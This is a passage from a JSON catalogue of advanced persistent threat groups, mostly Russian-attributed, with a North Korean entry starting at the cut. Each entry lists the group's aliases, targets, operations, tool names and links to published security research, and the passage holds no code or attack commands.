"https://app.box.com/s/g55oxdd3q63hyngbjm4fbipfct94wrye", + 
"http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/wp-mandiant-matryoshka-mining.pdf", + "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296.pdf", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html", + "http://fancybear.net/", + "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/", + "https://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf", + "https://cdn.area1security.com/reports/Area-1-Security-PhishingBarismaHoldings.pdf", + "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/" + ], + "attck_id": null, + "comment": "Called out by DHS & FBI as responsible for cyber attacks associated with US election 2016.Allegedly attributed the first UEFI rootkit seen in the wild: LoJax (2018), Overlaps with Zebrocy" + }, + { + "country": "russia", + "names": [ + "EuroAPT", + "APT29", + "Hammer Toss", + "Fritillary", + "Cozy Duke", + "SeaDuke", + "Minidionis", + "CozyCar", + "Cozer", + "Dukes", + "Cozy Bear", + "Yttrium / StellarParticle", + "Office Monkeys / TEMP.Monkeys", + "IRON HEMLOCK", + "Group 100" + ], + "targets": [ + "This threat actor targets government ministries and agencies in Europe, the US, Central Asia, East Africa, and the Middle East, associated with DNC attacks" + ], + "operations": [ + "Operation Ghost" + ], + "description": "phishing emails", + "tools": [ + "AdobeARM", + "CozyDuke", + "Grizzly Steppe", + "SeaDuke", + "MiniDionis", + "POSHSPY", + "RegDuke", + "FatDuke", + "PolyglotDuke", + "Tadpole", + "SeaDaddy implant developed in Python and compiled with py2exe", + "ATI-Agent", + "Spikerush", + "CosmicDuke", + "Vernaldrop", + "MiniDuke", + "OnionDuke", + "Hammertoss" + ], + "links": [ + 
"https://securelist.com/the-cozyduke-apt/69731/", + "https://aptnotes.malwareconfig.com/web/viewer.html?file=../APTnotes/2015/apt29-hammertoss-stealthy-tactics-define-a.pdf", + "https://www.welivesecurity.com/2019/10/17/operation-ghost-dukes-never-left/", + "https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/", + "https://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf", + "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/", + "https://www.istrosec.com/blog/apt-sk-cobalt/", + "https://cybergeeks.tech/how-to-defeat-the-russian-dukes-a-step-by-step-analysis-of-miniduke-used-by-apt29-cozy-bear/", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "http://www.volexity.com/blog/", + "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www2.fireeye.com/rs/848-DID-242/images/RPT-M-Trends-2017.pdf" + ], + "attck_id": null, + "comment": "Active campaign post 2016 US presidential election" + }, + { + "country": "russia", + "names": [ + "Group 88", + "Turla Team", + "Uroburos", + "IRON HUNTER", + "Waterbug", + "Snake", + "ITG12", + "Turla Group ", + "MAKERSMARK", + "SIG23", + "Krypton", + "Venomous Bear" + ], + "targets": [ + "Targeting several governments and sensitive businesses such as the defense industry" + ], + "operations": [ + "Epic Turla", + "Witchcoven", + "Satellite Turla", + "Mosquito", + "The 'Penquin' Turla", + "RUAG hack", + "Moonlight Maze" + ], + "description": null, + "tools": [ + "AdobeARM", + "WhiteBear", + "tasklist", + "wce", + "ATI-Agent", + "Tavdig", + "Wipbot", + 
"Uroburos", + "Neuron", + "Nautilus", + "systeminfo", + "Turla", + "pwdump", + "net", + "gpresult", + "Agent.BTZ", + "MiniDionis", + "Gazer", + "Agent.dne" + ], + "links": [ + "https://medium.com/chronicle-blog/who-is-gossipgirl-3b4170f846c0", + "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case", + "https://securelist.com/blog/research/67962/the-penquin-turla-2/", + "https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/", + "https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180251/Penquins_Moonlit_Maze_PDF_eng.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf", + "https://securelist.com/blog/research/72081/satellite-turla-apt-command-and-control-in-the-sky/", + "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/", + "http://www.sueddeutsche.de/digital/it-sicherheit-einbrechen-ausbreiten-abgreifen-1.3887843", + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", + "https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments", + "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/", + "https://www.ncsc.gov.uk/alerts/turla-group-malware", + "https://blog.sekoia.io/turla-new-phishing-campaign-eastern-europe/", + "https://cybergeeks.tech/a-step-by-step-analysis-of-the-russian-apt-turla-backdoor-called-tinyturla/", + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", + "https://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/", + "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", + 
"https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/", + "https://securelist.com/kopiluwak-a-new-javascript-payload-from-turla/77429/", + "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack", + "https://twitter.com/lehtior2/status/893085897226412036", + "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", + "https://www.wired.com/2017/04/russian-hackers-used-backdoor-two-decades/", + "https://motherboard.vice.com/en_us/article/vvk83b/moonlight-maze-turla-link" + ], + "attck_id": null, + "comment": "Turla also uses OilRig's (APT34) implants " + }, + { + "country": "russia", + "names": [ + "Havex", + "Fertger", + "IRON LIBERTY", + "Dymalloy", + "TEMP.Isotope", + "Dragonfly", + "ALLANITE", + "Crouching Yeti", + "Berserk Bear", + "Energetic Bear", + "Group 24", + "Anger Bear", + "Koala Team", + "PEACEPIPE" + ], + "targets": [ + "This threat actor targets companies in the education, energy, construction, information technology, and pharmaceutical sectors for the purposes of espionage. It uses malware tailored to target industrial control systems. 
Energy, Middle East oil and natural gas as the goal, dedicated to gather relevant information, technology company in Western Europe that produces civil, military and critical infrastructure communications equipment" + ], + "operations": [], + "description": "Active", + "tools": [ + "Impacket", + "LightsOut ExploitKit", + "Inveigh", + "PsExec", + "Nmap", + "SMBTrap", + "Persistence through .LNK file manipulations", + "Havex RAT", + "Dirsearch", + "MCMD", + "Wpscan", + "Subbrute", + "Oldrea", + "Sqlmap", + "Sublist3r", + "Commix", + "PHPMailer", + "Web Shells (PHP)" + ], + "links": [ + "https://us-cert.cisa.gov/ncas/alerts/aa20-296a", + "https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html", + "https://www.secureworks.com/research/mcmd-malware-analysis", + "http://www.netresec.com/?page=Blog&month=2014-10&post=Full-Disclosure-of-Havex-Trojans", + "https://threatmatrix.cylance.com/en_us/home/energetic-dragonfly-dymalloy-bear-2-0.html", + "https://www.fireeye.com/content/dam/fireeye-www/company/events/infosec/threat-landscape-overview-fireeye-summit-paris.pdf", + "https://threatpost.com/energy-watering-hole-attack-used-lightsout-exploit-kit/104772/", + "https://securelist.com/energetic-bear-crouching-yeti/85345/", + "https://vblocalhost.com/uploads/VB2021-Slowik.pdf", + "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", + "https://securelist.com/blog/incidents/35520/the-teamspy-crew-attacks-abusing-teamviewer-for-cyberespionage-8/", + "https://www.secureworks.com/blog/own-the-router-own-the-traffic", + "https://theintercept.com/2020/12/17/russia-hack-austin-texas/", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf" + ], + "attck_id": null, + "comment": 
"Detected in Middle East networks in 2014, Compromise via spear phish or SWC, Motivation somewhat unclear; CrowdStrike lists Berserk Bear as separate group (evolution of Energetic) while Symantec sees Energetic Bear and Berserk Bear as single group named Dragonfly" + }, + { + "country": "russia", + "names": [ + "Iron Viking", + "Hades", + "Iridium", + "Quedagh Group", + "Grey Energy", + "BE2 APT", + "Quedagh", + "Electrum", + "TEMP.Noble", + "Sandworm", + "IRON VIKING", + "TeleBots", + "Black Energy", + "Voodoo Bear", + "Sandworm Team (MITRE G0034)" + ], + "targets": [ + "This threat actor targets industrial control systems, using a tool called Black Energy, associated with electricity and power generation for espionage, denial of service, and data destruction purposes. Ukrainian energy sector, Eastern Europe. " + ], + "operations": [ + "Ukrenergo", + "Black Energy", + "NPetya, NotPetya", + "Ukraine Power Grid 2016-12-17" + ], + "description": null, + "tools": [ + "Zekapab", + "GCat", + "OlympicDestroyer", + "Delphocy", + "Zebrocy", + "GreyEngergy Mini as their 1st-stage implant", + "Industroyer", + "CVE-2014-4114", + "CrashOverride" + ], + "links": [ + "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/", + "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf", + "https://cert.gov.ua/article/39518", + "https://securelist.com/olympic-destroyer-is-still-alive/86169/", + "http://www.isightpartners.com/2016/01/ukraine-and-sandworm-team/", + "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/", + "https://ics.sans.org/blog/2016/01/09/confirmation-of-a-coordinated-attack-on-the-ukrainian-power-grid", + "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/", + 
"https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf", + "https://securelist.com/from-blackenergy-to-expetr/78937/", + "https://www.state.gov/rewards-for-justice-reward-offer-for-information-on-russian-military-intelligence-officers-conducting-malicious-activity-against-u-s-critical-infrastructure/", + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "http://www.isightpartners.com/2014/10/cve-2014-4114/", + "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm", + "https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector", + "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/", + "https://www.us-cert.gov/ncas/alerts/TA17-163A", + "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", + "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/", + "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + ], + "attck_id": null, + "comment": "Linked to Kiev Dec2016 ICS cyberattack" + }, + { + "country": "russia", + "names": [ + "Carbanak", + "Anunak", + "FIN7", + "Carbon Spider" + ], + "targets": [ + "Bank of Valetta, Malta" + ], + "operations": [], + "description": null, + "tools": [ + "PowerSource" + ], + "links": [ + "https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdf", + "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/", + "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor", + "https://www.fortinet.com/blog/threat-research/bioload-fin7-boostwrite-lost-twin.html", + "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html", + 
"https://www.esentire.com/security-advisories/notorious-cybercrime-gang-fin7-lands-malware-in-law-firm-using-fake-legal-complaint-against-jack-daniels-owner-brown-forman-inc", + "https://www.rsa.com/content/dam/premium/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/", + "https://blog.morphisec.com/the-evolution-of-the-fin7-jssloader", + "https://blog.malwarebytes.com/threat-analysis/2019/10/the-forgotten-domain-exploring-a-link-between-magecart-group-5-and-the-carbanak-apt/", + "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", + "https://securityaffairs.co/wordpress/64083/apt/fin7-new-techniques.html", + "https://blog.cyber4sight.com/2017/04/similarities-between-carbanak-and-fin7-malware-suggest-actors-are-closely-related/", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns" + ], + "attck_id": null, + "comment": "Overlaps with Carbanak (but not the same group)" + }, + { + "country": "russia", + "names": [ + "FIN8" + ], + "targets": [ + "Hotel-Entertainment Industry, POS malware attack" + ], + "operations": [], + "description": null, + "tools": [ + "PUNCHTRACK", + "PoSlurp", + "ShellTea", + "PUNCHBUGGY", + "PowerSniff", + "BADHATCH" + ], + "links": [ + "https://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation", + "https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/", + 
"https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf", + "http://blog.morphisec.com/security-alert-fin8-is-back", + "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html", + "https://www.root9b.com/sites/default/files/whitepapers/PoS%20Malware%20ShellTea%20PoSlurp_YARA.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "Inception Framework", + "Blue Odin" + ], + "targets": [ + "This threat actor targets governments and diplomatic organizations for espionage purposes. Suspected Operator in Ukraine working for Russia or its allies." + ], + "operations": [ + "Red October", + "Cloud Atlas" + ], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/recent-cloud-atlas-activity/92016/", + "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/", + "http://securelist.com/blog/research/68083/cloud-atlas-redoctober-apt-is-back-in-style/", + "https://www.bluecoat.com/security-blog/2014-12-09/blue-coat-exposes-%E2%80%9C-inception-framework%E2%80%9D-very-sophisticated-layered-malware", + "https://securelist.com/blog/incidents/57647/the-red-october-campaign/", + "https://www.symantec.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "SIG39", + "TeamSpy Crew" + ], + "targets": [ + "This threat actor primarily compromises government entities and human rights activists in Eastern Europe and Central Asia for espionage purposes. It has also compromised private and public sector entities in the Middle East and in Western countries." 
+ ], + "operations": [ + "TeamSpy" + ], + "description": null, + "tools": [ + "JAVA RATs", + "Malicious TeamViewer versions" + ], + "links": [ + "https://blog.crysys.hu/2018/03/territorial-dispute-nsas-perspective-on-apt-landscape/", + "http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/theteamspystory_final_t2.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "Ratopak", + "BuhTrap" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Mimikatz", + "LURK", + "CVE-2012-0158", + "AmmyAdmin", + "NSIS", + "PuntoSwitcher (like Keylogger)" + ], + "links": [ + "https://www.netscout.com/blog/asert/diving-buhtrap-banking-trojan-activity", + "https://www.welivesecurity.com/2019/07/11/buhtrap-zero-day-espionage-campaigns/", + "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/", + "http://www.welivesecurity.com/2015/11/11/operation-buhtrap-malware-distributed-via-ammyy-com/", + "http://www.group-ib.com/brochures/gib-buhtrap-report.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "Carberb" + ], + "targets": [ + "USA" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://itlaw.wikia.com/wiki/Moonlight_Maze" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "???" 
+ ], + "targets": [ + "Swiss defence department" + ], + "operations": [ + "RUAG Espionage" + ], + "description": null, + "tools": [ + "Mimikatz", + "dsget", + "Tavdig/Wipbot/Epic", + "dsquery", + "Snake (Carbon) Rootkit", + "Uroburos", + "Turla Family" + ], + "links": [ + "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "Primitive Bear", + "BlueAlpha", + "Gamaredon Group", + "FSB 16th & 18th Centers", + "Shuckworm", + "ACTINIUM" + ], + "targets": [], + "operations": [ + "OP Armageddon", + "Op Gamework" + ], + "description": null, + "tools": [ + "DessertDown", + "QuietSieve", + "Pterodo", + "DinoTrain" + ], + "links": [ + "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/", + "https://cert.gov.ua/article/39386", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-intense-campaign-ukraine", + "https://blog.yoroi.company/research/the-russian-shadow-in-eastern-europe-ukrainian-mod-campaign/", + "https://www.anomali.com/blog/primitive-bear-gamaredon-targets-ukraine-with-timely-themes", + "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine", + "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/#indicators-of-compromise", + "http://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", + "https://mp.weixin.qq.com/s/OfDTcrTVAgjACeh0Z5wi7w", + "https://www.recordedfuture.com/bluealpha-iranian-apts/", + "https://lookingglasscyber.com/wp-content/uploads/2015/08/Operation_Armageddon_FINAL.pdf" + ], + "attck_id": null, + "comment": "Hijack infrastructure of Iranian APT33, APT35 & Muddywater, overlap to Callisto" + }, + { + "country": 
"russia", + "names": [ + "Cyber Berkut" + ], + "targets": [ + "Bellingcat" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.threatconnect.com/blog/russia-hacks-bellingcat-mh17-investigation/#.V-wnrubaeEU.twitter" + ], + "attck_id": null, + "comment": "During Ukrainian Revolution" + }, + { + "country": "russia", + "names": [ + "WhiteBear", + "Skipper Turla" + ], + "targets": [ + "embassies and diplomatic/foreign affair organizations, defense-related organizations" + ], + "operations": [], + "description": null, + "tools": [ + "Kopiluwak" + ], + "links": [ + "https://securelist.com/introducing-whitebear/81638/" + ], + "attck_id": null, + "comment": "Associated with Turla" + }, + { + "country": "russia", + "names": [ + "???" + ], + "targets": [ + "This threat actor targets critical infrastructure entities in the oil and gas sector, primarily in Ukraine. The threat actors deploy the BugDrop malware to remotely access the microphones in their targets' computers to eavesdrop on conversations." 
+ ], + "operations": [ + "BugDrop" + ], + "description": null, + "tools": [], + "links": [ + "https://cyberx-labs.com/en/blog/operation-bugdrop-cyberx-discovers-large-scale-cyber-reconnaissance-operation/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "GRU GTsST (Main Center for Special Technology)" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "NotPetya" + ], + "links": [ + "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html?utm_term=.23e3c7810049" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "Triton", + "TEMP.Veles", + "Xenotime" + ], + "targets": [ + "Oil refinery, other infrastructure" + ], + "operations": [], + "description": null, + "tools": [ + "Triton" + ], + "links": [ + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html", + "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html", + "https://dragos.com/wp-content/uploads/NA-EL-Threat-Perspective-2019.pdf", + "https://dragos.com/resource/trisis-analyzing-safety-system-targeting-malware/", + "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", + "https://dragos.com/resource/xenotime/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "Zebrocy" + ], + "targets": [ + "Germany, Indonesia, the United States, Taiwan, India, France, Serbia, Ecuador, Argentina, South Korea, Japan, China, Britain, South Africa, Italy, Hong Kong, Romania, Ukraine, Macedonia, Russia, Switzerland, Senegal, the Philippines, UAE, Qatar, 
Saudi Arabia, Pakistan, Thailand, Bahrain, Turkey, Bulgaria, Bangladesh" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/", + "https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/", + "https://securelist.com/zebrocys-multilanguage-malware-salad/90680/", + "https://securelist.com/a-zebrocy-go-downloader/89419/", + "https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "SectorJ04" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Dridex", + "Locky", + "FlawedAmmyy", + "GraceWire malicious software signed with valid digital signatures", + "The Trick", + "Jaff" + ], + "links": [ + "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/", + "https://www.mcafee.com/enterprise/en-us/threat-center/threat-landscape-dashboard/campaigns-details.operation-sectorj04-2019.html", + "https://www.bankinfosecurity.com/ta505-apt-group-returns-new-techniques-report-a-13678", + "https://www.databreachtoday.com/two-russians-indicted-over-100m-dridex-malware-thefts-a-13473" + ], + "attck_id": null, + "comment": "TTP indicates possibly TA505 Microsoft Security Intelligence and McAfee Teams have affiliated TA505 with SectorJ04 aka Evil Corp aka Dudear since 2014 - reference in Link2 Department of Justice issues warrant for arrest of Dridex member, whom is working for Russian FSB since 2017" + }, + { + "country": "russia", + "names": [ + "FullofDeep" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "QNAPCrypt ransomware" + ], + "links": [ + "https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/" + ], + "attck_id": null, + "comment": "Operates from Union State & Ukraine" + }, + { + 
"country": "russia", + "names": [ + "RedCurl" + ], + "targets": [ + "Russia, ukraine, Canada, Germany, the united Kingdom, norway, mainly targeting sectors: construction companies, financial and consulting companies, retailers, banks, insurance companies, law firms, travel agencies" + ], + "operations": [], + "description": null, + "tools": [ + "Powershell scripts" + ], + "links": [ + "https://www.group-ib.com/media/red-curl/" + ], + "attck_id": null, + "comment": "Corporate espionage and theft of documents" + }, + { + "country": "russia", + "names": [ + "Shathak", + "TA551" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Sliver", + "IcedID", + "Valak" + ], + "links": [ + "https://www.proofpoint.com/us/blog/security-briefs/ta551-uses-sliver-red-team-tool-new-activity", + "https://isc.sans.edu/diary/rss/26438", + "https://isc.sans.edu/forums/diary/More+TA551+Shathak+Word+docs+push+IcedID+Bokbot/26674", + "https://threatresearch.ext.hp.com/detecting-ta551-domains/", + "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/", + "https://unit42.paloaltonetworks.com/valak-evolution/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "StellarParticle", + "UNC2452", + "Dark Halo", + "NOBELIUM", + "Silver Fish" + ], + "targets": [ + "IT sector" + ], + "operations": [ + "Solarwinds Supply Chain Attack", + "FireEye Compromise" + ], + "description": null, + "tools": [ + "TEARDROP", + "CobaltStrike", + "SUNBURST", + "SUPERNOVA Webshell (likely by other unknown group)", + "COSMICGALE PowerShell Tool" + ], + "links": [ + "https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/", + "https://blogs.microsoft.com/on-the-issues/2021/05/27/nobelium-cyberattack-nativezone-solarwinds/", + "https://malpedia.caad.fkie.fraunhofer.de/actor/unc2452", + "https://blog.reversinglabs.com/blog/sunburst-the-next-level-of-stealth", + 
"https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://github.com/center-for-threat-informed-defense/public-resources/tree/master/solorigate", + "https://www.riskiq.com/blog/external-threat-management/solarwinds-c2-servers-new-tactics/", + "https://github.com/eanmeyer/SolarwindsVulnerablityInfo", + "https://us-cert.cisa.gov/ncas/alerts/aa20-352a", + "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", + "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html" + ], + "attck_id": null, + "comment": "High sophistication" + }, + { + "country": "russia", + "names": [ + "Lorec53", + "Saint Bear", + "Ember Bear", + "TA471", + "Lorec Bear", + "UAC-0056", + "UNC2589", + "Bleeding Bear" + ], + "targets": [ + "Ukraine" + ], + "operations": [], + "description": null, + "tools": [ + "WhisperGate wiper", + "Elephant Framework" + ], + "links": [ + "https://socprime.com/blog/cobalt-strike-beacon-grimplant-and-graphsteel-malware-massively-spread-by-uac-0056-threat-actors-in-targeted-phishing-emails-cert-ua-alert/", + "https://cert.gov.ua/article/37704", + "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/", + "https://www.crowdstrike.com/blog/who-is-ember-bear/", + "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "COLDRIVER", + "Callisto" + ], + "targets": [], + "operations": [], + 
"description": null, + "tools": [], + "links": [ + "https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/", + "https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/", + "https://natoassociation.ca/phishing-on-the-dnieper-russian-offensive-cyber-operations-in-ukraine/", + "https://www.f-secure.com/documents/996508/1030745/callisto-group" + ], + "attck_id": null, + "comment": "Overlap w/Gamaredon" + }, + { + "country": "north_korea", + "names": [ + "NewRomanic Cyber Army Team", + "ZINC", + "Lazarus Group", + "Nickel Academy", + "Labyrinth Chollima", + "Hidden Cobra", + "Unit 121", + "Bureau 121", + "Whois Hacking Team", + "Appleworm" + ], + "targets": [ + "Believed to be responsible for Dark Seoul, Ten Days of Rain, the Sony Pictures Entertainment attack,\u00c2\u00a0the SWIFT-related bank heists, and WannaCry. Known to the U.S. government as Hidden Cobra. Targeting also BitCoin Exchanges, financial sector, technology/engineering sector" + ], + "operations": [ + "Dream Job", + "ThreatNeedle", + "Applejeus", + "Blockbuster", + "Dark Seoul", + "KuCoin Hack", + "NorthStar", + "Inception" + ], + "description": "Delivery: usually via spear phishing email.Infrastructure: C2 often based on compromised servers,moving to own servers paid by bitcoin to preserve anonymityPersistency: tipically launching ransomware after operation to destroy evidences", + "tools": [ + "FallChill RAT", + "ThreatNeedle", + "Troy", + "Tdrop", + "WolfRAT", + "Destover", + "SheepRAT", + "Manuscrypt", + "HtDnDownLoader", + "Tdrop2", + "Volgmer", + "Hawup" + ], + "links": [ + "https://www.cisa.gov/uscert/ncas/alerts/aa22-108a", + " https://securelist.com/operation-applejeus/87553/", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/", + 
